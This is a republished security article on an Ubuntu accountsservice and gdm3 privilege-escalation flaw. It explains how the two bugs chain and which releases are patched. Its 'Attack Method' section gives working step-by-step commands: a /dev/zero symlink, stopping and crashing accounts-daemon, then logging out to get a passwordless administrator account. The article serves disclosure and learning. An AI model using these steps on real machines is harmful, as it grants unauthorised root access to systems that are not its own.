Exploiting and Patching Ubuntu’s accounts‑daemon & GDM3 Privilege‑Escalation Flaw
This article explains how a critical Ubuntu vulnerability discovered by security researcher Kevin Backhouse lets a standard user create a sudo‑enabled account without a password, details the step‑by‑step exploitation process, and outlines the official patches that mitigate the issue across affected LTS releases.
Attack Method
Create a symbolic link named .pam_environment in the user’s home directory that points to /dev/zero: ln -s /dev/zero .pam_environment If .pam_environment already exists, rename it first to avoid data loss.
Open the GNOME Region & Language settings and attempt to change the language. The dialog will freeze while the accounts-daemon process consumes 100 % CPU.
Remove the symbolic link to stop the daemon from repeatedly reading the malicious file: rm .pam_environment Find the PID of accounts-daemon (it appears at the top of top or can be obtained with pidof), then pause it:
pidof accounts-daemon # e.g. 597
kill -SIGSTOP 597Schedule a timer that, after logout, sends SIGSEGV to crash the daemon and then SIGCONT to resume it:
nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &Log out, wait a few seconds, and the crash forces GNOME to launch gnome-initial-setup, which prompts the creation of a new user account with administrator privileges. The new account can use sudo without a password.
Attack Principle
The exploit chains two bugs in Ubuntu desktop editions:
accounts-daemon (part of accountservice) reads .pam_environment via the function is_in_pam_environment. By linking this file to /dev/zero, the daemon reads an infinite stream of zeros, entering an endless loop and dropping its root privileges.
GNOME Display Manager (gdm3) queries accounts-daemon to determine the number of existing users during the initial‑setup phase. Because the daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account.
When accounts-daemon is forced to crash with SIGSEGV, gdm3 believes no users exist and forces the creation of a new admin account, completing the privilege escalation.
Official Emergency Fix
The bugs were reported on 17 October by security researcher Kevin Backhouse. Ubuntu and GNOME maintainers have released patches in the latest source code. Users should update their systems immediately.
The vulnerability affects the desktop editions of Ubuntu 20.10, 20.04, 18.04 and 16.04 LTS. Systems running only a command‑line interface or non‑GNOME desktop environments are not vulnerable.
For full technical details see the original security research blog: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
ITPUB
Official ITPUB account sharing technical insights, community news, and exciting events.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.